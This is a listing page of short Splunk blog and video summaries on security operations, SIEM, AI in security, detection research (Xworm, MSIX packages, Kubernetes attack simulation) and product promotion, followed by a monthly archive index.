|
By Splunk
Nearly all CISOs report they are now responsible for AI governance and risk management, cite the growing sophistication of threat actor capabilities as their greatest risk. Vast majority say AI enables more security events to be reviewed.
Featured Post
The role of the tier 1 SOC analyst has always been critical. It's the function responsible for holding the line day-to-day and responding when incidents happen. It's also the training ground for analysts, training them in a wide range of basics to prepare them to advance to tier 2. It's a role that has never been static but with the pace of change noticeably faster than ever before, the role of the tier 1 SOC analyst is evolving once again.
Let’s face it: humans are creatures of habit, and nothing rattles us quite like the prospect of change. (Just ask anyone who’s dared to swap out the office coffee brand—revolutions have started over less.) According to SHRM's research on change fatigue, today’s relentless pace of disruption is exhausting employees faster than a budget ergonomic chair. But here’s where it gets fascinating—where security, HR, and fraud analysis converge in ways you might not expect.
|
By Laiba Siddiqui
Hashing takes your data (like a password or file) and converts it into a fixed-length code that can’t be reversed. This makes it nearly impossible for attackers to figure out what the original data was, even if they steal the hash. In this article, I’ll explain hashing in detail, including its working principles, applications, the algorithms behind it, and how to apply it correctly.
|
By Huaibo Zhao
Earlier this year, we showcased how the Foundation-Sec-8B model’s chat capabilities can be leveraged within the Splunk App for Data Science and Deep Learning (DSDL) to summarize security events and provide detection suggestions. Building on its robust security expertise, Foundation-Sec-8B also supports zero-shot classification for a wide range of security tasks.
|
By Mick Baccio
Veterans in cybersecurity are just built different. They show up like a well-timed patch, quietly, decisively, and with an instinct for risk you can't fake. When you've owned mission-critical systems where the blast radius of a mistake is measured in lives, not log lines, you develop a rare sixth sense for risk that you simply can't teach in a bootcamp.
|
By Frank Myers
In the first part of our series, we examined the challenges facing state and local governments as they work to secure and maintain the availability of increasingly complex digital systems. Today, we turn our focus to how collaboration—powered by shared data platforms like Splunk—can enhance incident response and overall digital resilience.
|
By Olivia Henderson
In addition to Splunk’s recognition as an 11-time Leader in the 2025 Gartner Magic Quadrant for Security Information and Event Management (SIEM), we are honored to announce that Splunk has been ranked as the SIEM solution in all three Use Cases for the second consecutive time in the 2025 Gartner Critical Capabilities for Security Information and Event Management report.
Static code analysis wasn’t always built into the development process. That means most bugs were detected during testing, after the code was already merged and deployed. By that point, fixing issues was time-consuming, expensive, and risky. Small mistakes slipped into production. Security gaps widened and quality suffered. Static analysis shifts all of that left by bringing security and quality checks into the earliest stages of development.
|
By Drew Gibson
I’m not one to blog, but speaking with clients, peers, and colleagues, I often hear statements like “SIEM is dead” or “this is the SOC of the future.” So what do they really mean? Honestly, I’m not entirely sure either — there are so many conflicting viewpoints and ways of addressing this.
|
By Splunk
OpenClaw is the hottest opensource AI tool, but it comes with massive security risks. In this video I'll give you the controls to mitigate these risks.
|
By Splunk
Insider threats thrive in ambiguity. They exist in the space where everyday work and malicious intent overlap. Traditional defenses are not built to detect that overlap, they are built to stop outsiders, not to question the behavior of insiders who look legitimate until the moment they are not. User Entity and Behavior Analytics (UEBA) fills that gap by establishing a behavioral perimeter around every identity and device.
|
By Splunk
We simulate real-world adversary behaviors inside a Kubernetes cluster to validate how Tetragon’s kernel-level visibility translates into detectable, high-fidelity security signals in Splunk. Each simulation maps to techniques in the MITRE ATT&CK for Containers framework and showcases how eBPF instrumentation allows us to catch what traditional agents often miss—for example, process lineage, syscall context, and Kubernetes workload-level attribution.
|
By Splunk
Discover how SPL2 (Splunk Processing Language 2) is transforming the way organizations manage data at scale. In this demo, we dive deep into how SPL2 addresses modern data challenges by offering a unified, SQL-like syntax and powerful new tools like the Module Editor. With syntax that’s instantly familiar to current users, SPL2 removes barriers to adoption and lets teams leverage its power from day one.
|
By Splunk
MSIXBuilder transforms what was traditionally a complex, multi-tool process into a single automated workflow that mirrors actual attacker techniques. By automatically handling certificate lifecycle management, dependency resolution, and package signing, the tool removes the technical barriers that previously prevented security teams from creating realistic test scenarios. This means defenders can quickly generate both signed and unsigned MSIX packages to validate their AppXDeployment event log coverage, confirm detection rules, and build detection coverage that actually works against real-world threats.
|
By Splunk
Learn how Splunk Attack Analyzer saves analysts time and enhances SOC efficiency by automatically analyzing complex attack chains.
|
By Splunk
The Splunk Enterprise Security Content Update (ESCU) app is a powerful resource developed by the Splunk Threat Research Team. It provides out-of-the-box detection analytics mapped to the MITRE ATT&CK framework and tailored to various platforms such as Windows, Linux, and cloud environments. While installing ESCU is straightforward, operationalizing the content - meaning tuning, enabling, and maintaining it for real-world use - requires a few deliberate steps.
|
By Splunk
This demo video showcases Xworm attacks and Splunk detections finding the different ways it executes on an OS.
|
By Splunk
The Splunk Threat Research Team created a simple script tool to automatically extract the hidden stub modules from the resource entry images. This video demo shows how this tool can extract hidden payload on those images on non-corrupted.NET Loaders.
|
By Splunk
The hype around artificial intelligence (AI) and machine learning (ML) has exploded, sometimes overshadowing the real uses and innovations happening everyday at organizations across the globe. The reality is that applying AI and ML to data-dependent challenges presents opportunity for better security, faster innovation and overall improved efficiency.
|
By Splunk
Cyberattacks are top of mind for organizations across the globe. In fact, 62 percent of firms are being attacked at least weekly and 45 percent are experiencing a rise in the number of security threats. But do organizations have the processes in place to investigate and effectively respond to these incidents? IDC recently surveyed security decision makers at 600 organizations to understand the state of security operations today.
|
By Splunk
Do you have a plan for cybersecurity? Digital technology is touching every aspect of our lives, which is giving bad actors unlimited runway to create new threats daily. It's this atmosphere that makes it imperative that organizations are prepared, informed and actively hunting for adversaries.
|
By Splunk
How can you utilize machine data to be prepared for the General Data Protection Regulation of the European Union?
|
By Splunk
Security incidents can happen without warning and they often go undetected for long periods of time. Organizations struggle to identify incidents because they often work in silos or because the amount of alerts is overwhelming and hard to determine the signals among the noise.
|
By Splunk
A security information event management (SIEM) solution is like a radar system that pilots and air traffic controllers use. Without one, enterprise IT is flying blind. Although security appliances and system software are good at catching and logging isolated attacks and anomalous behavior, today's most serious threats are distributed, acting in concert across multiple systems and using advanced evasion techniques to avoid detection.
|
By Splunk
All data is security relevant and defending against threats involves every department in a company. With cyberthreats and bad actors constantly evolving, it is imperative for everyone in an organization to come together to identify and protect critical data.
|
By Splunk
Recent cyberattacks have made it clear that organizations of all sizes need to focus on a holistic and cohesive security strategy. Security operations centers (SOCs) have become a focal point in this effort, consolidating the right people, processes and technology to mitigate and remediate attacks.
|
By Splunk
Current IT security tools and mindsets are no longer adequate to meet the scope and complexity of today's threats. Internet security has evolved over the last ten years but advanced persistent threats and the sophistication of the malware have fundamentally changed the way security teams must think about these new threats and the tools used for detective controls.
- March 2026 (3)
- February 2026 (2)
- January 2026 (2)
- December 2025 (1)
- October 2025 (10)
- September 2025 (4)
- August 2025 (8)
- July 2025 (16)
- June 2025 (4)
- May 2025 (11)
- April 2025 (14)
- March 2025 (8)
- February 2025 (6)
- January 2025 (3)
- December 2024 (4)
- November 2024 (9)
- October 2024 (13)
- September 2024 (10)
- August 2024 (11)
- July 2024 (7)
- June 2024 (6)
- May 2024 (7)
- April 2024 (7)
- March 2024 (12)
- February 2024 (13)
- January 2024 (20)
- December 2023 (21)
- November 2023 (11)
- October 2023 (27)
- September 2023 (24)
- August 2023 (25)
- July 2023 (22)
- June 2023 (36)
- May 2023 (32)
- April 2023 (32)
- March 2023 (35)
- February 2023 (19)
- January 2023 (21)
- December 2022 (9)
- November 2022 (19)
- October 2022 (12)
- September 2022 (8)
- August 2022 (14)
- July 2022 (8)
- June 2022 (7)
- May 2022 (13)
- April 2022 (11)
- March 2022 (7)
- February 2022 (2)
- January 2022 (9)
- December 2021 (14)
- November 2021 (23)
- October 2021 (12)
- September 2021 (16)
- August 2021 (14)
- July 2021 (20)
- June 2021 (17)
- May 2021 (6)
- April 2021 (10)
- March 2021 (15)
- February 2021 (10)
- January 2021 (5)
- December 2020 (4)
- November 2020 (9)
- October 2020 (6)
- September 2020 (6)
- August 2020 (7)
- July 2020 (10)
- June 2020 (3)
- May 2020 (9)
- April 2020 (13)
- March 2020 (5)
- February 2020 (6)
- January 2020 (5)
- December 2019 (1)
- October 2019 (1)
- May 2019 (1)
- October 2018 (1)
- June 2018 (2)
- May 2018 (1)
- April 2018 (2)
- March 2018 (1)
- February 2018 (1)
- January 2018 (1)
Splunk produces software for searching, monitoring, and analyzing machine-generated big data, via a Web-style interface.
Splunk turns machine data into answers. Regardless of your organization’s size and industry, Splunk can give you the answers you need to solve your toughest IT, security and business challenges—with the option to deploy on-premises, in the cloud or via a hybrid approach.
Work the Way Your Data Works:
- Real-Time: Splunk gives you the real-time answers you need to meet customer expectations and business goals.
- Machine Data: Use Splunk to connect your machine data and gain insights into opportunities and risks for your business.
- Scale: Splunk scales to meet modern data needs — embrace the complexity, get the answers.
- AI and Machine Learning: Leverage artificial intelligence (AI) powered by machine learning for actionable and predictive insights.
Any Question. Any Data. One Splunk.